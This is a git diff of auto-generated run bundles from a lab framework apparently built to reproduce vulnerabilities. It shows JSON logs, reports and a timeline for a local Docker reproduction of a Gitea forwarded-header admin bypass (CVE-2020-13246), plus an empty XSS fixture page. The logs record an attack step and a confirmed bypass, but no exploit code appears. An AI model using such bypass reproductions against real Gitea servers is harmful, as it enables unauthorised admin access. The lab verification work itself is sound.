index 00000000..397569ce
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/doctor.json
@@ -0,0 +1,44 @@
+{
+  "status": "passed",
+  "ok": true,
+  "checks": [
+    {
+      "name": "docker-cli",
+      "ok": true,
+      "detail": "docker CLI available"
+    },
+    {
+      "name": "docker-daemon",
+      "ok": true,
+      "detail": "context=desktop-linux"
+    },
+    {
+      "name": "playwright-import",
+      "ok": true,
+      "detail": "playwright Python package import passed"
+    },
+    {
+      "name": "playwright-browser",
+      "ok": true,
+      "detail": "chromium runtime launch passed"
+    },
+    {
+      "name": "ports",
+      "ok": true,
+      "detail": "checked 1 host port bindings",
+      "bindings": [
+        {
+          "profile_id": "gitea-proxy-boundary",
+          "service": "app",
+          "binding": "18101:3000",
+          "port": 18101
+        }
+      ]
+    }
+  ],
+  "profile_ids": [
+    "gitea-proxy-boundary"
+  ],
+  "failure_count": 0,
+  "summary": "all checks passed"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-browser.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-browser.json
new file mode 100644
index 00000000..6c578a04
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Gitea Proxy Boundary Fixture - proof",
+  "page_url": "http://127.0.0.1:18101/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json
new file mode 100644
index 00000000..e2a9239d
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18101/"
+  }
+]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json
new file mode 100644
index 00000000..36fdd8d4
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json
@@ -0,0 +1,5 @@
+{
+  "url": "http://127.0.0.1:18101/",
+  "title": "Gitea Proxy Boundary Fixture - proof",
+  "body_excerpt": "\n  \n    Gitea Proxy Boundary Fixture\n    Forwarded header trust boundary and admin gate fixture.\n    Proof active: trusted forwarded headers crossed the boundary\n    System: gitea / Family: proxy-boundary\n    Admin boundary bypass confirmed.\n    \n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/ready.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/ready.json
new file mode 100644
index 00000000..17cccd9b
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/ready.json
@@ -0,0 +1,12 @@
+{
+  "status": "completed",
+  "detail": "baseline urls ready (1)",
+  "elapsed_seconds": 0.0,
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18101/",
+      "status_code": 200
+    }
+  ],
+  "compose_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/seed.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/seed.json
new file mode 100644
index 00000000..206e5829
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/seed.json
@@ -0,0 +1,21 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "detail": "fixture seeded"
+    }
+  ],
+  "seeded": true,
+  "result": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "fixture seeded",
+      "case_id": "gitea--CVE-2020-13246"
+    }
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html
new file mode 100644
index 00000000..af65440c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html
@@ -0,0 +1,62 @@
+<!doctype html>
+<html><head><meta charset='utf-8'><title>websafe 运行报告</title>
+<style>body{font-family:ui-sans-serif,system-ui,sans-serif;margin:2rem;line-height:1.55;background:#f8fafc;color:#0f172a;} code,pre{background:#e2e8f0;padding:.2rem .4rem;border-radius:.3rem;} pre{white-space:pre-wrap;} .grid{display:grid;grid-template-columns:repeat(2,minmax(0,1fr));gap:1rem;} .card{border:1px solid #cbd5e1;padding:1rem;border-radius:.75rem;background:#fff;} table{width:100%;border-collapse:collapse;background:#fff;border:1px solid #cbd5e1;border-radius:.75rem;overflow:hidden;} th,td{padding:.75rem;border-bottom:1px solid #e2e8f0;text-align:left;vertical-align:top;} img{max-width:100%;border:1px solid #cbd5e1;border-radius:.5rem;} .gallery{display:grid;grid-template-columns:repeat(auto-fit,minmax(320px,1fr));gap:1rem;}</style>
+</head><body>
+<h1>运行 gitea-gitea--CVE-2020-13246-20260318012806</h1>
+<div class='grid'>
+<div class='card'><strong>漏洞条目</strong><br><code>gitea--CVE-2020-13246</code></div>
+<div class='card'><strong>实证状态</strong><br><code>verified-real</code></div>
+<div class='card'><strong>复现 Profile</strong><br><code>gitea-proxy-boundary</code></div>
+<div class='card'><strong>Artifact 模式</strong><br><code>local-fixture</code></div>
+</div>
+<h2>Mermaid 时间线</h2>
+<pre>flowchart LR
+A[&quot;选择 Advisory&quot;] --&gt; B[&quot;解析 Repro Profile&quot;]
+B --&gt; C[&quot;生成 Compose 环境&quot;]
+C --&gt; D[&quot;采集基线快照&quot;]
+D --&gt; E[&quot;执行受控攻击步骤&quot;]
+E --&gt; F[&quot;浏览器回放验证&quot;]
+F --&gt; G[&quot;收集日志与证据&quot;]
+G --&gt; H[&quot;回写 Registry 与报告&quot;]</pre>
+<h2>运行时间线</h2>
+<table><thead><tr><th>时间</th><th>步骤</th><th>状态</th><th>说明</th></tr></thead><tbody>
+<tr><td><code>2026-03-18T01:28:06+00:00</code></td><td><code>select-advisory</code></td><td><code>completed</code></td><td>gitea--CVE-2020-13246</td></tr>
+<tr><td><code>2026-03-18T01:28:06+00:00</code></td><td><code>resolve-repro-profile</code></td><td><code>completed</code></td><td>gitea-proxy-boundary</td></tr>
+<tr><td><code>2026-03-18T01:28:07+00:00</code></td><td><code>doctor</code></td><td><code>completed</code></td><td>all checks passed</td></tr>
+<tr><td><code>2026-03-18T01:28:10+00:00</code></td><td><code>provision-compose-environment</code></td><td><code>ready</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:28:10+00:00</code></td><td><code>wait-ready</code></td><td><code>completed</code></td><td>baseline urls ready (1)</td></tr>
+<tr><td><code>2026-03-18T01:28:10+00:00</code></td><td><code>seed-environment</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:28:10+00:00</code></td><td><code>baseline-snapshot</code></td><td><code>completed</code></td><td>urls=1</td></tr>
+<tr><td><code>2026-03-18T01:28:10+00:00</code></td><td><code>browser-replay-before-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:28:10+00:00</code></td><td><code>controlled-attack-chain</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:28:11+00:00</code></td><td><code>browser-replay-after-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:28:11+00:00</code></td><td><code>collect-logs-and-evidence</code></td><td><code>completed</code></td><td>container_logs=1</td></tr>
+<tr><td><code>2026-03-18T01:28:13+00:00</code></td><td><code>cleanup-compose-environment</code></td><td><code>completed</code></td><td>docker compose down completed</td></tr>
+<tr><td><code>2026-03-18T01:28:13+00:00</code></td><td><code>update-registry-and-reports</code></td><td><code>completed</code></td><td>gitea-gitea--CVE-2020-13246-20260318012806</td></tr>
+</tbody></table>
+<h2>攻击步骤</h2>
+<table><thead><tr><th>工具</th><th>状态</th><th>输出</th></tr></thead><tbody>
+<tr><td><code>gitea.proxy-boundary</code></td><td><code>completed</code></td><td><code>/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json</code></td></tr>
+</tbody></table>
+<h2>浏览器截图</h2>
+<div class='gallery'>
+<figure><img src='assets/baseline.png' alt='baseline'><figcaption><code>assets/baseline.png</code></figcaption></figure>
+<figure><img src='assets/proof.png' alt='proof'><figcaption><code>assets/proof.png</code></figcaption></figure>
+</div>
+<h2>证据清单</h2><ul>
+<li><code>compose/compose.yaml</code></li>
+<li><code>assets/baseline.png</code></li>
+<li><code>assets/baseline-dom.html</code></li>
+<li><code>logs/baseline-console.json</code></li>
+<li><code>logs/baseline-network.json</code></li>
+<li><code>logs/baseline-page.json</code></li>
+<li><code>assets/proof.png</code></li>
+<li><code>assets/proof-dom.html</code></li>
+<li><code>logs/proof-console.json</code></li>
+<li><code>logs/proof-network.json</code></li>
+<li><code>logs/proof-page.json</code></li>
+<li><code>logs/docker/app.log</code></li>
+<li><code>logs/attack.json</code></li>
+<li><code>logs/baseline.json</code></li>
+</ul>
+</body></html>
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md
new file mode 100644
index 00000000..d9996e5c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md
@@ -0,0 +1,86 @@
+# 运行 gitea-gitea--CVE-2020-13246-20260318012806
+
+> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle
+
+- 漏洞条目: `gitea--CVE-2020-13246`
+- 系统: `gitea`
+- Repro Profile: `gitea-proxy-boundary`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 启动时间: `2026-03-18T01:28:06+00:00`
+- 完成时间: `2026-03-18T01:28:13+00:00`
+- 阻塞原因: `-`
+- Compose 服务: `app`
+
+## 运行时间线
+
+- Mermaid: [timeline.mmd](/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd)
+
+| 时间 | 步骤 | 状态 | 说明 |
+|------|------|------|------|
+| `2026-03-18T01:28:06+00:00` | `select-advisory` | `completed` | gitea--CVE-2020-13246 |
+| `2026-03-18T01:28:06+00:00` | `resolve-repro-profile` | `completed` | gitea-proxy-boundary |
+| `2026-03-18T01:28:07+00:00` | `doctor` | `completed` | all checks passed |
+| `2026-03-18T01:28:10+00:00` | `provision-compose-environment` | `ready` | - |
+| `2026-03-18T01:28:10+00:00` | `wait-ready` | `completed` | baseline urls ready (1) |
+| `2026-03-18T01:28:10+00:00` | `seed-environment` | `completed` | steps=1 |
+| `2026-03-18T01:28:10+00:00` | `baseline-snapshot` | `completed` | urls=1 |
+| `2026-03-18T01:28:10+00:00` | `browser-replay-before-attack` | `completed` | - |
+| `2026-03-18T01:28:10+00:00` | `controlled-attack-chain` | `completed` | steps=1 |
+| `2026-03-18T01:28:11+00:00` | `browser-replay-after-attack` | `completed` | - |
+| `2026-03-18T01:28:11+00:00` | `collect-logs-and-evidence` | `completed` | container_logs=1 |
+| `2026-03-18T01:28:13+00:00` | `cleanup-compose-environment` | `completed` | docker compose down completed |
+| `2026-03-18T01:28:13+00:00` | `update-registry-and-reports` | `completed` | gitea-gitea--CVE-2020-13246-20260318012806 |
+
+## Compose 拓扑
+
+- Compose 文件: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml`
+- 服务列表: `app`
+
+## 攻击步骤
+
+| 工具/步骤 | 状态 | 结果 |
+|-----------|------|------|
+| `gitea.proxy-boundary` | `completed` | `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json` |
+
+## 证据摘要
+
+- Baseline: `1`
+- 攻击步骤: `1`
+- 浏览器证据: `10`
+- 容器日志: `1`
+- 请求日志: `2`
+
+## 浏览器截图
+
+![baseline](assets/baseline.png)
+![proof](assets/proof.png)
+
+## 浏览器证据
+
+- `assets/baseline.png`
+- `assets/baseline-dom.html`
+- `logs/baseline-console.json`
+- `logs/baseline-network.json`
+- `logs/baseline-page.json`
+- `assets/proof.png`
+- `assets/proof-dom.html`
+- `logs/proof-console.json`
+- `logs/proof-network.json`
+- `logs/proof-page.json`
+
+## 容器日志
+
+- `logs/docker/app.log`
+
+## 请求与基线日志
+
+- `logs/attack.json`
+- `logs/baseline.json`
+
+## 最小化验证说明
+
+- 仅限自有资产、本地靶场或已授权实验目标。
+- 默认执行 minimal-proof；不会把破坏性或不可回滚动作作为默认路径。
+- 若浏览器证据缺失，前端类案例不会被标为 `verified-*`。
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/run.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/run.json
new file mode 100644
index 00000000..e2b01700
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/run.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "gitea-gitea--CVE-2020-13246-20260318012806",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2020-13246",
+  "repro_profile_id": "gitea-proxy-boundary",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+    ],
+    "baseline_title": "Gitea Proxy Boundary Fixture",
+    "proof_title": "Gitea Proxy Boundary Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:28:06+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2020-13246"
+    },
+    {
+      "at": "2026-03-18T01:28:06+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-proxy-boundary"
+    },
+    {
+      "at": "2026-03-18T01:28:07+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:11+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:11+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2020-13246-20260318012806"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "trusted forwarded headers crossed the boundary"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:28:06+00:00",
+  "finished_at": "2026-03-18T01:28:13+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd"
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd
new file mode 100644
index 00000000..71155437
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd
@@ -0,0 +1,8 @@
+flowchart LR
+A["选择 Advisory"] --> B["解析 Repro Profile"]
+B --> C["生成 Compose 环境"]
+C --> D["采集基线快照"]
+D --> E["执行受控攻击步骤"]
+E --> F["浏览器回放验证"]
+F --> G["收集日志与证据"]
+G --> H["回写 Registry 与报告"]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html
new file mode 100644
index 00000000..50bc4932
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Gitea Stored XSS Fixture</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Gitea Stored XSS Fixture</h1>
+    <p>Stored payload rendering path for browser proof capture.</p>
+    <div class="baseline">Baseline ready</div>
+    <p>System: <code>gitea</code> / Family: <code>xss</code></p>
+    
+    
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png
new file mode 100644
index 0000000000000000000000000000000000000000..450c77a3cb700df5d649e920114849209880a55c
GIT binary patch
literal 27148
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
